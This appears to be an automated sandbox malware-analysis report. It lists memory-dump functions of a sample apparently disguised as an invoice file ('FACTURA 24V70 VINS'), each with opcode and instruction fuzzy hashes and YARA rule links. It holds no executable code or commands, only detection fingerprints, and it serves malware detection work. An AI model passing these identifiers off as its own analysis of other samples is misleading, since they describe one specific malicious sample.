Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49c246dab69a76eb3bdd13fa7760cf205aa7b3af1249ea37482aa7061eb0c7e4
Instruction ID: 0b39131e47b89b08540e5b0e344fc36e5ed8ea0be8d639cde23ed6921011b2d2
Opcode Fuzzy Hash: 49c246dab69a76eb3bdd13fa7760cf205aa7b3af1249ea37482aa7061eb0c7e4
Instruction Fuzzy Hash: 89012171A0020EEBDB04DFA9D8459AEB7F8FF58304F50405AE915E7390D6749A018BA1

Function 0180625D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70e4ce207deabe0459a4defaeeb021b1530b33057a89e971e60e458df13a854
Instruction ID: 7965dcb4b0f2fb5cad0bec7f6a34aa8acefc42388ae05402a133e11246c62326
Opcode Fuzzy Hash: e70e4ce207deabe0459a4defaeeb021b1530b33057a89e971e60e458df13a854
Instruction Fuzzy Hash: B1018471A0020DEFDB04DFA9D8459AEB7F8FF58304F10401AF904E7391D6749A00CBA0

Function 0176CA6F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction ID: 3a58f58fa5296381b9c3702e000f862b4a18965f9901df42ff43a207bdccf0c8
Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction Fuzzy Hash: 4601F4322006859BE3239B1DC809F59FB9CEF81750F0841E5FE848B6A1D778CD40C612

Function 018061E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8febbcf454baaa820ae76b03a447e0fa22c1eb10ab0ba6175ea31bc7ce234ca
Instruction ID: 80ca35600d5f24324d5771e6a8224d0a9351d981746295ba338642f587d491b6
Opcode Fuzzy Hash: f8febbcf454baaa820ae76b03a447e0fa22c1eb10ab0ba6175ea31bc7ce234ca
Instruction Fuzzy Hash: E7018F71A0025DEBDF01DFA9D845AEEBBF8BF58314F14405AE501E7280E774EA01CB95

Function 017B63C0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction ID: 62057b0287e0c3ff23c8eaae7fe0d5ef7b4e2266ddac16ff8b578493b511f06f
Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction Fuzzy Hash: FDF01D7220001DBFEF019F95DD80DEFBB7EEB59298B104125FA1192160D735DE21ABA0

Function 017BA4B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f48744fdb521a9829be5b846cd428177ac46149d5d45742f3337872d9730f57
Instruction ID: 65d820d60cf1bb150327a96f142ce38e3717269ef861432b10064ba712cd1c25
Opcode Fuzzy Hash: 0f48744fdb521a9829be5b846cd428177ac46149d5d45742f3337872d9730f57
Instruction Fuzzy Hash: A3018936100219ABCF229E84D840EDA7F66FB4C754F058101FE1966220C336DA70EF81

Function 0172C0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b44f732aa64a30e71cf93493a92dd74bdf34a7efbc0bf5a83a4bd163a8b7da
Instruction ID: 43b0f0ff90d97741106ff301a5afaf276be91e324a0f0c250c927e8c9d34d40d
Opcode Fuzzy Hash: 74b44f732aa64a30e71cf93493a92dd74bdf34a7efbc0bf5a83a4bd163a8b7da
Instruction Fuzzy Hash: 75F024B1208361ABF317961D9C02B66F296EBE0650F35807AEB058B2C1E971EC0283A4

Function 0176656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66b89c40e4379fa5e6aeff5ffaa9fb9f3f3e8e913006449f609c828acfdde226
Instruction ID: b02ec84a9df97d5cdf5e845e1f6ede0ff33db368b5160905bcbbf2a385257352
Opcode Fuzzy Hash: 66b89c40e4379fa5e6aeff5ffaa9fb9f3f3e8e913006449f609c828acfdde226
Instruction Fuzzy Hash: 4501A4702406819BE3329B2CCD4DF65B7A8BB80B00FD84294FE029BAD7E769D9418610

Function 017D437C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction ID: cb27b754408b820a712b484b4cb13b00a8ab05613981196a23a77bc622d8e6a9
Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction Fuzzy Hash: 5DF0E932341A1347EB75AA2DC414B2AEAB59F90900B09052C9903EBE80DF70D8008780

Function 017BE872 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction ID: 13679a82a5bb5e07eac44fcf161a2b0e7657ed69b20966c610b3dd3ae4a2d7d8
Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction Fuzzy Hash: 60F05E32791A229BE3219A4EDCC0F96F7A8AFD5A60F191465A6189B364CB60EC4187D0

Function 017BC89D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61f3dc097517d188ec12aac0ee25ba70ec8d8cc29d3a67f1a4d087adaf67e697
Instruction ID: 6ebabd13392c7387ef34fecad5ae863bf6b526f6d24df67287cf7da6445c2b4f
Opcode Fuzzy Hash: 61f3dc097517d188ec12aac0ee25ba70ec8d8cc29d3a67f1a4d087adaf67e697
Instruction Fuzzy Hash: 5DF0AF706053059FC710EF28C845A1AF7E4FF98710F40865AB898DB394E634EA01CB96

Function 01760854 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction ID: 18ee5739ddea9e770d1499302252c12666848391cd86c32f74494a25af90cb75
Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction Fuzzy Hash: B6F02E72600201AFE324DB25CC04F86F7EDEFA8300F148078AA44CB2A4FAB0EE11C694

Function 017BC912 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47021df3ddf5808feee96c7e1af7c1f91eb6b14054404b3a6ea25ec0f225500e
Instruction ID: 49bd6962db8e8c17bcacceb5b73ff5d518751cb2bcf3a9ac5fe6a1676c72c51f
Opcode Fuzzy Hash: 47021df3ddf5808feee96c7e1af7c1f91eb6b14054404b3a6ea25ec0f225500e
Instruction Fuzzy Hash: F4F04F70A01249EFDB14EF69C555AAEF7B4FF18300F008056A955EB385DA34EA01CB51

Function 017347FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65788ef79d8b23a9e8f458a74736d9efb3eea80a73a9e13f205472f03c1c784
Instruction ID: 981353cc26f3a728aaecc2c2ca9b2b63798013962ae2d8c9fa700da3c8b05820
Opcode Fuzzy Hash: e65788ef79d8b23a9e8f458a74736d9efb3eea80a73a9e13f205472f03c1c784
Instruction Fuzzy Hash: A8F02E359863E08FE73BCB2CC408BA1FBC49B80730F0888AAC58B83543C320D880CA10

Function 017F0115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5d8ad5a1069217e263e766c2005e10ee6cdd7cbe7dd11a371e3621b57cc6906
Instruction ID: 0dfde6113537a95e1e9167587057ef141793da8e1a4de0897e87c4f45ab7cd59
Opcode Fuzzy Hash: c5d8ad5a1069217e263e766c2005e10ee6cdd7cbe7dd11a371e3621b57cc6906
Instruction Fuzzy Hash: 52F0273A52A6C047CF335F2C645C2DAEF96A75A110F29144DEEA15730BD9748A83CB20

Function 0176C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dbeaae609fd1a1cd335c9caa0b8966b86d51cdc93fc7ec1a8f903e0f4410598
Instruction ID: c6e613f67a30ed32819bf21a83a04fc14dc3d4552c1f304a2df531ed8c6c2e35
Opcode Fuzzy Hash: 5dbeaae609fd1a1cd335c9caa0b8966b86d51cdc93fc7ec1a8f903e0f4410598
Instruction Fuzzy Hash: 4CF02071515A919FE333DB1CC548B21FBECAB017B0F08A866DD8AC7952C364FC80CA99

Function 01772619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: 05422d008f4d59402c17883c883580d6613c9ac094e9cc92692e0ac3ac23675a
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: 49E0D8723016012BEB229E598CC4F47B76EEFD6B14F04007AB6049F256CAE2DC0982A4

Function 017C6030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: 6a4fff35c7471a1d851fca3831aeaa538626a3ab05e27afcc3e003209d4714a1
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: 28F030721042049FE3218F49D984F62F7F8EB05764F45C06DF609AB661D379EC80CBA4

Function 01730710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: 8cc3a118935d5174ff54bc9afc04c4d35b4d3837be61b40fc74a44410ba2caad
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: 30F06D3A2047559BEB17DF19D050AA9FBE8FB95360B0400D5F8468B352EB32E982CB94

Function 017649D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: a22314e781bb19fce7b9d376254d7e535cb90e34fc8f0299968e9320e0eaf3a5
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 4EE0D832244145BBD3311E698808F6EF7ADEBD4BA0F150429EA428B550DB70DD40C7E8

Function 01804164 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 330a8b0176cd6c5d0072d422b361afd58d31acdc54ad81324725b21609435afb
Instruction ID: c0fff5a4179aaf66a7741ab0f77e1b8f4cc87c78ff9e0b3734d7b57c8491d1a4
Opcode Fuzzy Hash: 330a8b0176cd6c5d0072d422b361afd58d31acdc54ad81324725b21609435afb
Instruction Fuzzy Hash: 64F0E531A66E958FE7F3D72CDD44B5177E0AF10730F4A05A4D500C7992C320ED80C650

Function 017D678E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction ID: 463f1ec5ce9da75521086c4308b2488c85153a77b1af5f5cea9ef0f257cfb51c
Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction Fuzzy Hash: E4E04F72A40128BBDB219B998D05F9AFEBCDBA4EB0F164055BA01EB194E670DE00D690

Function 018008C0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction ID: aa7a297f3c97bca81992a0bc14407445b6ac080cb224eeb77260943ccdbb8456
Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction Fuzzy Hash: E4E09B316403588BCB768A1ECD41B73B7E8FF957A4F158069E94587752D231FA42C6D0

Function 017325E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef5c247b3263648d5d667f0d39439d7cc49831a4ccef38fc23ea250e4865adc1
Instruction ID: 25f70aaec2a1be4868e857ec395971e8b42e9062fe1e9981da70d7eb18b9af73
Opcode Fuzzy Hash: ef5c247b3263648d5d667f0d39439d7cc49831a4ccef38fc23ea250e4865adc1
Instruction Fuzzy Hash: E5E092321006549BC722BF29DD05F9AB79AEFA0364F114515F125575A5CB30A910C788

Function 017EA456 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction ID: 6e480bdd27fa66cae72144904de6fdb4398d0ebcfad8a2fb2ac8a782b9d2d445
Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction Fuzzy Hash: B8E09231010651DFE7326F2AC80CB52FBE0FF50711F148C2DA09A024B4C7B498C0CA40

Function 017B4000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: e906af5edb3896e3d89c963dac7456cf950d4a1e637e325cd943048f7d5f8c02
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: 14E0C9343003058FE715CF19C080B92BBB6BFD5A10F28C0A8A94A8F206EB32E842CB40

Function 0176CA38 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8ce16c07ac1a25305b9be288611f20235365345bbd62948a09675b6926aa53
Instruction ID: 40b9a42997152665b7405efac621507267b27c9312bf1e9f3bffd9e50ed86953
Opcode Fuzzy Hash: fa8ce16c07ac1a25305b9be288611f20235365345bbd62948a09675b6926aa53
Instruction Fuzzy Hash: E3D02B324850306BCB77E5197C08FA7BB5DDB44360F018861FA0892015D564CD8196C4

Function 0172823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: f396e489b5f62a07dec1306c896dd7bad65103616a8b6e92a164d57208e56590
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: C4E0C231148A30EFDB323F16DC04F62F6E1FF55B10F244869E085064B99772AC82DB59

Function 01732050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82832a2f5bb198e553d042bc62b8f0c8beee13d8ca8b653dd192ddbb32ee1cd2
Instruction ID: 1ff33a4bb5deca64fe74882c6c37216d03ecdd4e2be0ea364b47424c72b023bf
Opcode Fuzzy Hash: 82832a2f5bb198e553d042bc62b8f0c8beee13d8ca8b653dd192ddbb32ee1cd2
Instruction Fuzzy Hash: 4EE0C232100564ABC322FF5DDD00F4AB39EEFE4360F104121F155876D9CB20AD00C798

Function 01768A90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: ed7548794aee32ea8befd7b0683ce1009d307cd0f55a93da6b0851528f952531
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: 75E08633111B1487C728DE18D511B76B7A8EF45720F09463EAA5347780C534E544CB95

Function 01786AA4 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction ID: 54f8d335c6cc637217a0c83b2210091b6c41869745db810f529649d5f0eb42b0
Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction Fuzzy Hash: D1D05E36511A50EFC332AF1BEA04D13FBF9FBC4A207050A2EA54583A24C770A806CBA0

Function 0176E59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: bdaeecba143da3727f462d7bcfad4ec2925339bc0bc944954098c72df5a9bd91
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: F7D0A932208620ABD732AA1CFC04FC3B3E8BB88720F060859B019C7090C360AC81CA88

Function 017AE908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction ID: 98ec11cd43290f9696eb4f92a7a7470e8db6d5a40e31f2fed589fe5d32eef5e9
Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction Fuzzy Hash: E4E0EC359507849BDF16EF59C644F5AFBB5BB94B40F550458A1085B665CA24A900CB40

Function 0172A0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: 0583c9b5c60fea8d0ce79335003a13d135851d78c9a6ee977ebb87b6c1e9c4a6
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: C8D0223221203193CB2866556804F63E915EB80AA0F2A006CB80AD3C00C5088C43C2E0

Function 0176A830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: edbbe8db903b0d68d7a6a5a60fe6d0d77bdac9bffd0a547ace30009fc649cf73
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: 5DD012371D055DBBCB11AF66DC01F957BA9E764BA0F444420B518875A0C63AE950D584

Function 0176CA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3987e76787e3285811a463d6928a12122f4aa4c0f7ecbef8c78f5466ab5b87a5
Instruction ID: a21811c6fefc5c6e7bd4fd4bd5a7884b071edc4696a8fbc67701f353d148c8c2
Opcode Fuzzy Hash: 3987e76787e3285811a463d6928a12122f4aa4c0f7ecbef8c78f5466ab5b87a5
Instruction Fuzzy Hash: 39D0A930601002CBDF3BDF08CA10E2EFAB8FF50641F9000ACEB4492420E328DE01CB00

Function 0176C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 91e0ca9c3ccf127e0074c385e5f1f823f7e72d0e8bdef0c76885acd45acf12ed
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
